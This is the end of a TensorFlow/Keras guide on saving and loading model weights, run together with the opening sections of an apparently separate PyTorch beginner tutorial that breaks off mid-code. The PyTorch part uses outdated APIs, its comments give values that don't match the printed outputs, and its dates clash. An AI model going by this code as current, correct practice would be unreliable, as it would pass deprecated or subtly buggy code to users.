return {"output_dim": self.output_dim, "name": self.name}
subclassed_model = SubclassedModel(10)
# Call the subclassed model once to create the weights.
subclassed_model(tf.ones((1, 784)))
# Copy weights from functional_model to subclassed_model.
subclassed_model.set_weights(functional_model.get_weights())
assert len(functional_model.weights) == len(subclassed_model.weights)
for a, b in zip(functional_model.weights, subclassed_model.weights):
np.testing.assert_allclose(a.numpy(), b.numpy())
The case of stateless layers
Because stateless layers do not change the order or number of weights, models can have compatible architectures even if there are extra/missing stateless layers.
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
outputs = keras.layers.Dense(10, name="predictions")(x)
functional_model = keras.Model(inputs=inputs, outputs=outputs, name="3_layer_mlp")
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
# Add a dropout layer, which does not contain any weights.
x = keras.layers.Dropout(0.5)(x)
outputs = keras.layers.Dense(10, name="predictions")(x)
functional_model_with_dropout = keras.Model(
inputs=inputs, outputs=outputs, name="3_layer_mlp"
)
functional_model_with_dropout.set_weights(functional_model.get_weights())
APIs for saving weights to disk & loading them back
Weights can be saved to disk by calling model.save_weightsin the following formats:
TensorFlow Checkpoint
HDF5
The default format for model.save_weights is TensorFlow checkpoint.There are two ways to specify the save format:
save_formatargument: Set the value tosave_format="tf"orsave_format="h5".
pathargument: If the path ends with.h5or.hdf5, then the HDF5 format is used. Other suffixes will result in a TensorFlow checkpoint unlesssave_formatis set.
There is also an option of retrieving weights as in-memory numpy arrays. Each API has its pros and cons which are detailed below.
TF Checkpoint format
Example:
# Runnable example
sequential_model = keras.Sequential(
[
keras.Input(shape=(784,), name="digits"),
keras.layers.Dense(64, activation="relu", name="dense_1"),
keras.layers.Dense(64, activation="relu", name="dense_2"),
keras.layers.Dense(10, name="predictions"),
]
)
sequential_model.save_weights("ckpt")
load_status = sequential_model.load_weights("ckpt")
# `assert_consumed` can be used as validation that all variable values have been
# restored from the checkpoint. See `tf.train.Checkpoint.restore` for other
# methods in the Status object.
load_status.assert_consumed()
<tensorflow.python.training.tracking.util.CheckpointLoadStatus at 0x7f071ffab7f0>
Format details
The TensorFlow Checkpoint format saves and restores the weights usingobject attribute names. For instance, consider the tf.keras.layers.Dense layer.The layer contains two weights: dense.kernel and dense.bias.When the layer is saved to the tf format, the resulting checkpoint contains the keys"kernel" and "bias" and their corresponding weight values.For more information see"Loading mechanics" in the TF Checkpoint guide.
Note that attribute/graph edge is named after the name used in parent object,not the name of the variable. Consider the CustomLayer in the example below.The variable CustomLayer.var is saved with "var" as part of key, not "var_a".
class CustomLayer(keras.layers.Layer):
def __init__(self, a):
self.var = tf.Variable(a, name="var_a")
layer = CustomLayer(5)
layer_ckpt = tf.train.Checkpoint(layer=layer).save("custom_layer")
ckpt_reader = tf.train.load_checkpoint(layer_ckpt)
ckpt_reader.get_variable_to_dtype_map()
{'save_counter/.ATTRIBUTES/VARIABLE_VALUE': tf.int64, '_CHECKPOINTABLE_OBJECT_GRAPH': tf.string, 'layer/var/.ATTRIBUTES/VARIABLE_VALUE': tf.int32}
Transfer learning example
Essentially, as long as two models have the same architecture, they are able to share the same checkpoint.
Example:
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
outputs = keras.layers.Dense(10, name="predictions")(x)
functional_model = keras.Model(inputs=inputs, outputs=outputs, name="3_layer_mlp")
# Extract a portion of the functional model defined in the Setup section.
# The following lines produce a new model that excludes the final output
# layer of the functional model.
pretrained = keras.Model(
functional_model.inputs, functional_model.layers[-1].input, name="pretrained_model"
)
# Randomly assign "trained" weights.
for w in pretrained.weights:
w.assign(tf.random.normal(w.shape))
pretrained.save_weights("pretrained_ckpt")
pretrained.summary()
# Assume this is a separate program where only 'pretrained_ckpt' exists.
# Create a new functional model with a different output dimension.
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
outputs = keras.layers.Dense(5, name="predictions")(x)
model = keras.Model(inputs=inputs, outputs=outputs, name="new_model")
# Load the weights from pretrained_ckpt into model.
model.load_weights("pretrained_ckpt")
# Check that all of the pretrained weights have been loaded.
for a, b in zip(pretrained.weights, model.weights):
np.testing.assert_allclose(a.numpy(), b.numpy())
print("\n", "-" * 50)
model.summary()
# Example 2: Sequential model
# Recreate the pretrained model, and load the saved weights.
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
pretrained_model = keras.Model(inputs=inputs, outputs=x, name="pretrained")
# Sequential example:
model = keras.Sequential([pretrained_model, keras.layers.Dense(5, name="predictions")])
model.summary()
pretrained_model.load_weights("pretrained_ckpt")
# Warning! Calling `model.load_weights('pretrained_ckpt')` won't throw an error,
# but will *not* work as expected. If you inspect the weights, you'll see that
# none of the weights will have loaded. `pretrained_model.load_weights()` is the
# correct method to call.
Model: "pretrained_model" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= digits (InputLayer) [(None, 784)] 0 _________________________________________________________________ dense_1 (Dense) (None, 64) 50240 _________________________________________________________________ dense_2 (Dense) (None, 64) 4160 ================================================================= Total params: 54,400 Trainable params: 54,400 Non-trainable params: 0 _________________________________________________________________ -------------------------------------------------- Model: "new_model" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= digits (InputLayer) [(None, 784)] 0 _________________________________________________________________ dense_1 (Dense) (None, 64) 50240 _________________________________________________________________ dense_2 (Dense) (None, 64) 4160 _________________________________________________________________ predictions (Dense) (None, 5) 325 ================================================================= Total params: 54,725 Trainable params: 54,725 Non-trainable params: 0 _________________________________________________________________ Model: "sequential_3" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= pretrained (Functional) (None, 64) 54400 _________________________________________________________________ predictions (Dense) (None, 5) 325 ================================================================= Total params: 54,725 Trainable params: 54,725 Non-trainable params: 0 _________________________________________________________________ <tensorflow.python.training.tracking.util.CheckpointLoadStatus at 0x7f06880ea0b8>
It is generally recommended to stick to the same API for building models. If you switch between Sequential and Functional, or Functional and subclassed, etc., then always rebuild the pre-trained model and load the pre-trained weights to that model.
The next question is, how can weights be saved and loaded to different modelsif the model architectures are quite different?The solution is to use tf.train.Checkpoint to save and restore the exact layers/variables.
Example:
# Create a subclassed model that essentially uses functional_model's first
# and last layers.
# First, save the weights of functional_model's first and last dense layers.
first_dense = functional_model.layers[1]
last_dense = functional_model.layers[-1]
ckpt_path = tf.train.Checkpoint(
dense=first_dense, kernel=last_dense.kernel, bias=last_dense.bias
).save("ckpt")
# Define the subclassed model.
class ContrivedModel(keras.Model):
def __init__(self):
super(ContrivedModel, self).__init__()
self.first_dense = keras.layers.Dense(64)
self.kernel = self.add_variable("kernel", shape=(64, 10))
self.bias = self.add_variable("bias", shape=(10,))
def call(self, inputs):
x = self.first_dense(inputs)
return tf.matmul(x, self.kernel) + self.bias
model = ContrivedModel()
# Call model on inputs to create the variables of the dense layer.
_ = model(tf.ones((1, 784)))
# Create a Checkpoint with the same structure as before, and load the weights.
tf.train.Checkpoint(
dense=model.first_dense, kernel=model.kernel, bias=model.bias
).restore(ckpt_path).assert_consumed()
/tmpfs/src/tf_docs_env/lib/python3.6/site-packages/tensorflow/python/keras/engine/base_layer.py:2281: UserWarning: `layer.add_variable` is deprecated and will be removed in a future version. Please use `layer.add_weight` method instead. warnings.warn('`layer.add_variable` is deprecated and ' <tensorflow.python.training.tracking.util.CheckpointLoadStatus at 0x7f071fe855c0>
HDF5 format
The HDF5 format contains weights grouped by layer names.The weights are lists ordered by concatenating the list of trainable weightsto the list of non-trainable weights (same as layer.weights).Thus, a model can use a hdf5 checkpoint if it has the same layers and trainablestatuses as saved in the checkpoint.
Example:
# Runnable example
sequential_model = keras.Sequential(
[
keras.Input(shape=(784,), name="digits"),
keras.layers.Dense(64, activation="relu", name="dense_1"),
keras.layers.Dense(64, activation="relu", name="dense_2"),
keras.layers.Dense(10, name="predictions"),
]
)
sequential_model.save_weights("weights.h5")
sequential_model.load_weights("weights.h5")
Note that changing layer.trainable may result in a differentlayer.weights ordering when the model contains nested layers.
class NestedDenseLayer(keras.layers.Layer):
def __init__(self, units, name=None):
super(NestedDenseLayer, self).__init__(name=name)
self.dense_1 = keras.layers.Dense(units, name="dense_1")
self.dense_2 = keras.layers.Dense(units, name="dense_2")
def call(self, inputs):
return self.dense_2(self.dense_1(inputs))
nested_model = keras.Sequential([keras.Input((784,)), NestedDenseLayer(10, "nested")])
variable_names = [v.name for v in nested_model.weights]
print("variables: {}".format(variable_names))
print("\nChanging trainable status of one of the nested layers...")
nested_model.get_layer("nested").dense_1.trainable = False
variable_names_2 = [v.name for v in nested_model.weights]
print("\nvariables: {}".format(variable_names_2))
print("variable ordering changed:", variable_names != variable_names_2)
variables: ['nested/dense_1/kernel:0', 'nested/dense_1/bias:0', 'nested/dense_2/kernel:0', 'nested/dense_2/bias:0'] Changing trainable status of one of the nested layers... variables: ['nested/dense_2/kernel:0', 'nested/dense_2/bias:0', 'nested/dense_1/kernel:0', 'nested/dense_1/bias:0'] variable ordering changed: True
Transfer learning example
When loading pretrained weights from HDF5, it is recommended to load the weights into the original checkpointed model, and then extract the desired weights/layers into a new model.
Example:
def create_functional_model():
inputs = keras.Input(shape=(784,), name="digits")
x = keras.layers.Dense(64, activation="relu", name="dense_1")(inputs)
x = keras.layers.Dense(64, activation="relu", name="dense_2")(x)
outputs = keras.layers.Dense(10, name="predictions")(x)
return keras.Model(inputs=inputs, outputs=outputs, name="3_layer_mlp")
functional_model = create_functional_model()
functional_model.save_weights("pretrained_weights.h5")
# In a separate program:
pretrained_model = create_functional_model()
pretrained_model.load_weights("pretrained_weights.h5")
# Create a new model by extracting layers from the original model:
extracted_layers = pretrained_model.layers[:-1]
extracted_layers.append(keras.layers.Dense(5, name="dense_3"))
model = keras.Sequential(extracted_layers)
model.summary()
Model: "sequential_6" _________________________________________________________________ Layer (type) Output Shape Param # ================================================================= dense_1 (Dense) (None, 64) 50240 _________________________________________________________________ dense_2 (Dense) (None, 64) 4160 _________________________________________________________________ dense_3 (Dense) (None, 5) 325 ================================================================= Total params: 54,725 Trainable params: 54,725 Non-trainable params: 0 _________________________________________________________________
|
PyTorch With Baby Steps: From y=x To Training A Convnet
Joshua Mitchell / February 08, 2018
29 min read
Note: This tutorial was made using PyTorch v0.4.0 (May 30th, 2018). I'm not sure how compatible it is with later versions.
Motivation:#
As I was going through the Deep Learning Blitz tutorial from pytorch.org, I had a lot of questions. I googled my way through all of them, but I had wished there was a more extensive example set (i.e. starting from a really basic model all the way to a CNN). That way I could see very clearly, through examples, what each component did in isolation.
Since I did that for myself, I figured I might as well put it online for everyone else who's learning PyTorch. This is not designed to be an end-all-be-all tutorial (in fact, I use a lot of pytorch tutorial code myself), so for each section, I'll link to various resources that helped me understand the concepts. Hopefully, in conjunction with the examples, it'll be helpful.
Please feel free to email me if you have any questions or suggestions: [email protected]
Outline:#
Bare Minimum Model: create an absolute bare minimum model with Tensors
Basic Linear Regression Model: create a basic linear regression model (i.e. no training or anything yet; just initializing it and doing the calculation)
Calculating Our Gradient: calculate our gradient based on the linear layer
Calculating Our Loss: calculate our loss based on the linear layer
Recalculating/Updating Our Weights: calculate the change in our weights based on the gradient wrt loss
Updating Our Weights More Than Once: set up a for loop to do steps 3-5 an arbitrary number of times (i.e. epochs)
Making Our Epochs Only Use A Subset Of The Data: make the for loop only use a portion of the data (i.e. a minibatch)
Changing Our Model from Linear Regression to Neural Network: make it fit the data better
Abstracting Our Neural Network Into Its Pytorch Class: make it more maintainable and less messy
Changing Our Input From Arbitrary Vectors To Images: make it do something more interesting
Adding A Convolutional Layer: make our model do convolutions before it does the other stuff
Adding A Pooling Layer: make our model faster by only taking the biggest "most important" values into consideration
Making More Optimizations: change our activation functions to ReLU, add more layers, and other housekeeping
import torch # Tensor Package (for use on GPU)
from torch.autograd import Variable # for computational graphs
import torch.nn as nn ## Neural Network package
import torch.nn.functional as F # Non-linearities package
import torch.optim as optim # Optimization package
from torch.utils.data import Dataset, TensorDataset, DataLoader # for dealing with data
import torchvision # for dealing with vision data
import torchvision.transforms as transforms # for modifying vision data to run it through models
import matplotlib.pyplot as plt # for plotting
import numpy as np
1. Bare Minimum Model#
Links:
http://pytorch.org/tutorials/beginner/blitz/tensor_tutorial.html - Pytorch's Tensor Tutorial
https://www.google.com/search?q=PyTorch+Tensor+Examples - More Examples
Quick Tensor Demonstration:#
# here's a one dimensional array the pytorch way (i.e. allowing GPU computations):
x1 = torch.Tensor([1, 2, 3, 4])
# here's a two dimensional array (i.e. of size 2 x 4):
x2 = torch.Tensor([[5, 6, 7, 8], [9, 10, 11, 12]])
# here's a three dimensional array (i.e. of size 2 x 2 x 4):
x3 = torch.Tensor([[[1, 2, 3, 4], [5, 6, 7, 8]], [[9, 10, 11, 12], [13, 14, 15, 16]]])
# x1
print("----------------------------------------")
print(x1[0])
print("----------------------------------------")
# prints 1.0
----------------------------------------1.0----------------------------------------
# x2
print("----------------------------------------")
print(x2[0, 0])
# prints 5.0; the first entry of the first vector
print("----------------------------------------")
print(x2[0, :])
# prints 5, 6, 7, 8; all the entries of the first vector
print("----------------------------------------")
print(x2[:, 2])
print("----------------------------------------")
# prints 7, 11; all the third entries of each vector vector
----------------------------------------5.0---------------------------------------- 5 6 7 8[torch.FloatTensor of size 4]---------------------------------------- 7 11[torch.FloatTensor of size 2]----------------------------------------
# x3
print("----------------------------------------")
print(x3[0, 0, 0])
# prints 1.0; the first entry of the first vector of the first set of vectors
print("----------------------------------------")
print(x3[:, 0, 0])
# prints 1, 9; the first entry of each first vector in each set of vectors
print("----------------------------------------")
print(x3[0, :, 0])
# prints 1, 5; pick the first set of vectors, and from each vector, choose the first entry
print("----------------------------------------")
print(x3[0, 0, :])
print("----------------------------------------")
# prints 1, 2, 3, 4; everything in the first vector of the first set
----------------------------------------1.0---------------------------------------- 1 9[torch.FloatTensor of size 2]---------------------------------------- 1 5[torch.FloatTensor of size 2]---------------------------------------- 1 2 3 4[torch.FloatTensor of size 4]----------------------------------------
Bare Minimum Model (Y = X)#
x1_node = Variable(x1, requires_grad=True)
# we put our tensor in a Variable so we can use it for training and other stuff later
print("----------------------------------------")
print(x1_node)
print("----------------------------------------")
# prints Variable containing 1, 2, 3, 4
----------------------------------------Variable containing: 1 2 3 4[torch.FloatTensor of size 4]----------------------------------------
y_node = x1_node
# we did some "stuff" to x1_node (except we didn't do anything) and then assigned the result to a new y variable
print("----------------------------------------")
print(y_node)
print("----------------------------------------")
# prints Variable containing 1, 2, 3, 4
----------------------------------------Variable containing: 1 2 3 4[torch.FloatTensor of size 4]----------------------------------------
2. Basic Linear Regression Model#
Links:
http://pytorch.org/docs/0.3.1/nn.html#linear-layers - pytorch linear layer documentation
https://www.khanacademy.org/math/ap-statistics/bivariate-data-ap/least-squares-regression/v/example-estimating-from-regression-line - Khan Academy
https://www.google.com/search?q=Linear+Regression+Examples - More Examples
x1 = torch.Tensor([1, 2, 3, 4])
x1_var = Variable(x1, requires_grad=True)
linear_layer1 = nn.Linear(4, 1)
# create a linear layer (i.e. a linear equation: w1x1 + w2x2 + w3x3 + w4x4 + b, with 4 inputs and 1 output)
# w and b stand for weight and bias, respectively
predicted_y = linear_layer1(x1_var)
# run the x1 variable through the linear equation and put the output in predicted_y
print("----------------------------------------")
print(predicted_y)
print("----------------------------------------")
# prints the predicted y value (the weights and bias are initialized randomly; my output was 1.3712)
----------------------------------------Variable containing:-0.6885[torch.FloatTensor of size 1]----------------------------------------
3. Calculating Our Gradient (Of Our Linear Layer Wrt Our Input)#
Links:
http://pytorch.org/tutorials/beginner/blitz/autograd_tutorial.html - pytorch's automatic gradient package
https://discuss.pytorch.org/t/how-the-backward-works-for-torch-variable/907/3 - good discussion on pytorch forums
https://www.khanacademy.org/math/multivariable-calculus/multivariable-derivatives/gradient-and-directional-derivatives/v/gradient - Khan Academy
https://www.google.com/search?q=Machine+Learning+Gradient+Examples - More Examples
x1 = torch.Tensor([1, 2, 3, 4])
x1_var = Variable(x1, requires_grad=True)
linear_layer1 = nn.Linear(4, 1)
target_y = Variable(torch.Tensor([0]), requires_grad=False)
predicted_y = linear_layer1(x1_var)
# at this point, we want the gradient of our linear layer with respect to our original input, x
# the Variable object we put our Tensor in is supposed to store its respective gradients, so let's look:
print("----------------------------------------")
print(x1_var.grad)
print("----------------------------------------")
# this prints None, because we haven't computed any gradients yet.
# we have to call the backward() function from our predicted results in order to compute gradients with respect to x
predicted_y.backward()
print(x1_var.grad)
print("----------------------------------------")
# This is the gradient Tensor that holds the partial derivatives of our linear function with respect to each entry in x1
----------------------------------------
None
----------------------------------------
Variable containing:
-0.0225
0.4638
0.3847
0.0056
[torch.FloatTensor of size 4]
----------------------------------------
4. Calculating the Loss Function#
Links:
https://stackoverflow.com/questions/42877989/what-is-a-loss-function-in-simple-words - good SO post
http://pytorch.org/docs/0.3.1/nn.html#id38 - pytorch loss functions documentation
https://en.wikipedia.org/wiki/Loss_function - wikipedia
https://www.google.com/search?q=Loss+Function+Examples - More Examples
x1 = torch.Tensor([1, 2, 3, 4])
x1_var = Variable(x1, requires_grad=True)
linear_layer1 = nn.Linear(4, 1)
target_y = Variable(torch.Tensor([0]), requires_grad=False)
# ideally, we want our model to predict 0 when we input our x1_var variable below.
# here we're just sticking a Tensor with just 0 in it into a variable, and labeling it our target y value
# I put requires_grad=False because we're not computing any gradient with respect to our target (more on that later)
predicted_y = linear_layer1(x1_var)
print("----------------------------------------")
print(predicted_y)
print("----------------------------------------")
# prints 3.0995 for me; will probably be different for you.
loss_function = nn.MSELoss()
# this creates a function that takes a ground-truth Tensor and your model's output Tensor as inputs and calculates the "loss"
# in this case, it calculates the Mean Squared Error (a measurement for how far away your output is from where it should be)
loss = loss_function(predicted_y, target_y)
# here we actually use the function to compare our predicted_y vs our target_y
print(loss)
print("----------------------------------------")
# prints 9.6067 for me; will probably be different for you. It's just (target_y - predicted_y)^2 in this case.
----------------------------------------
Variable containing:
0.1232
[torch.FloatTensor of size 1]
----------------------------------------
Variable containing:
1.00000e-02 *
1.5189
[torch.FloatTensor of size 1]
----------------------------------------
5. Recalculating/Updating Our Weights (Using Gradient of Loss Wrt Weights)#
Links:
http://pytorch.org/docs/master/optim.html - optimizer package documentation
# Now, instead of calculating the gradient of our linear layer wrt our inputs (x) in lesson 3,
# we're going to calculate the gradient of our loss function wrt our weights / biases
x1 = torch.Tensor([1, 2, 3, 4])
x1_var = Variable(x1, requires_grad=True)
linear_layer1 = nn.Linear(4, 1)
target_y = Variable(torch.Tensor([0]), requires_grad=False)
predicted_y = linear_layer1(x1_var)
loss_function = nn.MSELoss()
loss = loss_function(predicted_y, target_y)
optimizer = optim.SGD(linear_layer1.parameters(), lr=1e-1)
# here we've created an optimizer object that's responsible for changing the weights
# we told it which weights to change (those of our linear_layer1 model) and how much to change them (learning rate / lr)
# but we haven't quite told it to change anything yet. First we have to calculate the gradient.
loss.backward()
# now that we have the gradient, let's look at our weights before we change them:
print("----------------------------------------")
print("Weights (before update):")
print(linear_layer1.weight)
print(linear_layer1.bias)
# let's also look at what our model predicts the output to be:
print("----------------------------------------")
print("Output (before update):")
print(linear_layer1(x1_var))
optimizer.step()
# we told the optimizer to subtract the learning rate * the gradient from our model weights
print("----------------------------------------")
print("Weights (after update):")
print(linear_layer1.weight)
print(linear_layer1.bias)
# looks like our weights and biases changed. How do we know they changed for the better?
# let's also look at what our model predicts the output to be now:
print("----------------------------------------")
print("Output (after update):")
print(linear_layer1(x1_var))
print("----------------------------------------")
# wow, that's a huge change (at least for me, and probably for you). It looks like our learning rate might be too high.
# perhaps we want to make our model learn slower, compensating with more than one weight update?
# next section!
----------------------------------------
Weights (before update):
Parameter containing:
-0.3612 0.1091 -0.4919 0.0260
[torch.FloatTensor of size 1x4]
Parameter containing:
-0.2044
[torch.FloatTensor of size 1]
----------------------------------------
Output (before update):
Variable containing:
-1.7191
[torch.FloatTensor of size 1]
----------------------------------------
Weights (after update):
Parameter containing:
-0.0173 0.7968 0.5396 1.4012
[torch.FloatTensor of size 1x4]
Parameter containing:
0.1395
[torch.FloatTensor of size 1]
----------------------------------------
Output (after update):
Variable containing:
8.9394
[torch.FloatTensor of size 1]
----------------------------------------
6. Updating Our Weights More than Once (I.E. Doing Step 3-6 a Few Times Aka "Epochs")#
Links:
https://wiki.python.org/moin/ForLoop - for loops in python
# this block of code is organized a little differently than section 5, but it's mostly the same code
# the only three differences are:
# - The "Hyperparameter" constants
# - The for loop (for helping the model do <number of epochs> training steps)
# - The linear_layer1.zero_grad() function call on line 25.
# (that's just to clear the gradients in memory, since we're starting the training over each iteration/epoch)
x1 = torch.Tensor([1, 2, 3, 4])
x1_var = Variable(x1, requires_grad=True)
linear_layer1 = nn.Linear(4, 1)
target_y = Variable(torch.Tensor([0]), requires_grad=False)
print("----------------------------------------")
print("Output (BEFORE UPDATE):")
print(linear_layer1(x1_var))
NUMBER_OF_EPOCHS = 3 # Number of times to update the weights
LEARNING_RATE = 1e-4 # Notice how I made the learning rate 1000 times smaller
loss_function = nn.MSELoss()
optimizer = optim.SGD(linear_layer1.parameters(), lr=LEARNING_RATE)
for epoch in range(NUMBER_OF_EPOCHS):
linear_layer1.zero_grad()
predicted_y = linear_layer1(x1_var)
loss = loss_function(predicted_y, target_y)
loss.backward()
optimizer.step()
print("----------------------------------------")
print("Output (UPDATE " + str(epoch + 1) + "):")
print(linear_layer1(x1_var))
print("Should be getting closer to 0...")
print("----------------------------------------")
# here is where you might discover that training could take a *long* time
# we're barely doing anything, computationally speaking, and it's already scaling up
# in the next section, we're going to add more data (other than one sample with 4 features),
# and then, with each epoch, we're only going to use a small portion of it (called a "batch").
----------------------------------------
Output (BEFORE UPDATE):
Variable containing:
-2.9463
[torch.FloatTensor of size 1]
----------------------------------------
Output (UPDATE 1):
Variable containing:
-2.9281
[torch.FloatTensor of size 1]
Should be getting closer to 0...
----------------------------------------
Output (UPDATE 2):
Variable containing:
-2.9099
[torch.FloatTensor of size 1]
Should be getting closer to 0...
----------------------------------------
Output (UPDATE 3):
Variable containing:
-2.8919
[torch.FloatTensor of size 1]
Should be getting closer to 0...
----------------------------------------
7. Making Our Epochs Only Use a Subset of the Data (I.E. A "Minibatch")#
Links:
https://discuss.pytorch.org/t/zero-grad-optimizer-or-net/1887 - good discussion on pytorch forums
https://stats.stackexchange.com/questions/49528/batch-gradient-descent-versus-stochastic-gradient-descent - good SE post
http://pytorch.org/docs/master/data.html - data utilities pytorch documentation
http://pytorch.org/tutorials/beginner/data_loading_tutorial.html - pytorch's data loading and processing tutorial
x = torch.Tensor([[0, 0, 1, 1],
[0, 1, 1, 0],
[1, 0, 1, 0],
[1, 1, 1, 1]])
target_y = torch.Tensor([0, 1, 1, 0])
# now, instead of having 1 data sample, we have 4 (oh yea, now we're in the big leagues)
# but, pytorch has a DataLoader class to help us scale up, so let's use that.
inputs = x # let's use the same naming convention as the pytorch documentation here
labels = target_y # and here
train = TensorDataset(inputs, labels) # here we're just putting our data samples into a tiny Tensor dataset
trainloader = DataLoader(train, batch_size=2, shuffle=False) # and then putting the dataset above into a data loader
# the batchsize=2 option just means that, later, when we iterate over it, we want to run our model on 2 samples at a time
linear_layer1 = nn.Linear(4, 1)
NUMBER_OF_EPOCHS = 3
LEARNING_RATE = 1e-4
loss_function = nn.MSELoss()
optimizer = optim.SGD(linear_layer1.parameters(), lr=LEARNING_RATE)
for epoch in range(NUMBER_OF_EPOCHS):
train_loader_iter = iter(trainloader) # here's the iterator we use to iterate over our training set
for batch_idx, (inputs, labels) in enumerate(train_loader_iter): # here we split apart our data so we can run it
linear_layer1.zero_grad()
inputs, labels = Variable(inputs.float()), Variable(labels.float())
predicted_y = linear_layer1(inputs)
loss = loss_function(predicted_y, labels)
loss.backward()
optimizer.step()
print("----------------------------------------")
print("Output (UPDATE: Epoch #" + str(epoch + 1) + ", Batch #" + str(batch_idx + 1) + "):")
print(linear_layer1(Variable(x)))
print("Should be getting closer to [0, 1, 1, 0]...") # but some of them aren't! we need a model that fits better...
# next up, we'll convert this model from regression to a NN
print("----------------------------------------")
----------------------------------------
Output (UPDATE: Epoch #1, Batch #1):
Variable containing:
0.4019
0.0645
0.0391
0.1555
[torch.FloatTensor of size 4x1]
Should be getting closer to [0, 1, 1, 0]...
----------------------------------------
Output (UPDATE: Epoch #1, Batch #2):
Variable containing:
0.4020
0.0646
0.0393
0.1557
[torch.FloatTensor of size 4x1]
Should be getting closer to [0, 1, 1, 0]...
----------------------------------------
Output (UPDATE: Epoch #2, Batch #1):
Variable containing:
0.4021
0.0648
0.0394
0.1558
[torch.FloatTensor of size 4x1]
Should be getting closer to [0, 1, 1, 0]...
----------------------------------------
Output (UPDATE: Epoch #2, Batch #2):
Variable containing:
0.4022
0.0650
0.0397
0.1560
[torch.FloatTensor of size 4x1]
Should be getting closer to [0, 1, 1, 0]...
----------------------------------------
Output (UPDATE: Epoch #3, Batch #1):
Variable containing:
0.4023
0.0652
0.0398
0.1562
[torch.FloatTensor of size 4x1]
Should be getting closer to [0, 1, 1, 0]...
----------------------------------------
Output (UPDATE: Epoch #3, Batch #2):
Variable containing:
0.4024
0.0653
0.0400
0.1564
[torch.FloatTensor of size 4x1]
Should be getting closer to [0, 1, 1, 0]...
----------------------------------------
8. Changing Our Model from Linear Regression to Neural Network (To Make It Fit the Data Better)#
Links:
https://www.youtube.com/watch?v=aircAruvnKk - Good video on what a neural network is (3blue1brown)
http://neuralnetworksanddeeplearning.com - Good online book on neural networks
https://www.deeplearningbook.org - Thedeep learning book
x = torch.Tensor([[0, 0, 1, 1],
[0, 1, 1, 0],
[1, 0, 1, 0],
[1, 1, 1, 1]])
target_y = torch.Tensor([0, 1, 1, 0])
inputs = x
labels = target_y
train = TensorDataset(inputs, labels)
trainloader = DataLoader(train, batch_size=4, shuffle=False)
linear_layer1 = nn.Linear(4, 2)
sigmoid = nn.Sigmoid() # this is the nonlinearity that we pass the output from layers 1 and 2 into
linear_layer2 = nn.Linear(2, 1) # this is our second layer (i.e. we're going to pass the outputs from sigmoid into here)
NUMBER_OF_EPOCHS = 3
LEARNING_RATE = 1e-1 # increased learning rate to make learning more obvious
loss_function = nn.MSELoss()
optimizer = optim.SGD(linear_layer1.parameters(), lr=LEARNING_RATE)
for epoch in range(NUMBER_OF_EPOCHS):
train_loader_iter = iter(trainloader)
for batch_idx, (inputs, labels) in enumerate(train_loader_iter):
linear_layer1.zero_grad()
inputs, labels = Variable(inputs.float()), Variable(labels.float())
linear_layer1_output = linear_layer1(inputs)
sigmoid_output = sigmoid(linear_layer1_output)
linear_layer2_output = linear_layer2(sigmoid_output)
sigmoid_output_2 = sigmoid(linear_layer2_output) # see how the output from one layer just goes into the second?
loss = loss_function(sigmoid_output_2, labels)
loss.backward()
optimizer.step()
print("----------------------------------------")
print("Output (UPDATE: Epoch #" + str(epoch + 1) + ", Batch #" + str(batch_idx + 1) + "):")
print(sigmoid(linear_layer2(sigmoid(linear_layer1(Variable(x)))))) # the nested functions are getting out of hand..
print("Should be getting closer to [0, 1, 1, 0]...") # they are if you increase the epochs amount... but it's slow!
print("----------------------------------------")
# Awesome, so we have a neural network (nn). But the nested functions and all the layers are starting to get bloated.
# Time to refactor. Luckily, PyTorch provides a class specifically for this: the Net class. We'll port our code there next.
----------------------------------------
Output (UPDATE: Epoch #1, Batch #1):
Variable containing:
0.2646
0.2660
0.2698
0.2578
[torch.FloatTensor of size 4x1]
Should be getting closer to [0, 1, 1, 0]...
----------------------------------------
Output (UPDATE: Epoch #2, Batch #1):
Variable containing:
0.2646
0.2661
0.2699
0.2579
[torch.FloatTensor of size 4x1]
Should be getting closer to [0, 1, 1, 0]...
----------------------------------------
Output (UPDATE: Epoch #3, Batch #1):
Variable containing:
0.2647
0.2662
0.2700
0.2580
[torch.FloatTensor of size 4x1]
Should be getting closer to [0, 1, 1, 0]...
----------------------------------------
9. Abstracting Our Neural Network into Its Pytorch Class (I.E. Making It More Maintainable and Less Messy)#
Links:
http://pytorch.org/tutorials/beginner/blitz/neural_networks_tutorial.html - pytorch neural network tutorial
x = torch.Tensor([[0, 0, 1, 1],
[0, 1, 1, 0],
[1, 0, 1, 0],
[1, 1, 1, 1]])
target_y = torch.Tensor([0, 1, 1, 0])
inputs = x
labels = target_y
train = TensorDataset(inputs, labels)
trainloader = DataLoader(train, batch_size=4, shuffle=False)
class Net(nn.Module):
def __init__(self):
super(Net, self).__init__()
self.fc1 = nn.Linear(4, 2) # here's where we define the same layers we had earlier
self.fc2 = nn.Linear(2, 1)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
x = self.fc1(x) # the forward function just sends everything through its respective layers
x = sigmoid(x) # including through the sigmoids after each Linear layer
x = self.fc2(x)
x = sigmoid(x)
return x
net = Net() # we made a blueprint above for our neural network, now we initialize one.
NUMBER_OF_EPOCHS = 3
LEARNING_RATE = 1e-1
loss_function = nn.MSELoss()
optimizer = optim.SGD(net.parameters(), lr=LEARNING_RATE) # slight difference: we optimize w.r.t. the net parameters now
for epoch in range(NUMBER_OF_EPOCHS):
train_loader_iter = iter(trainloader)
for batch_idx, (inputs, labels) in enumerate(train_loader_iter):
net.zero_grad() # same here: we have to zero out the gradient for the neural network's inputs
inputs, labels = Variable(inputs.float()), Variable(labels.float())
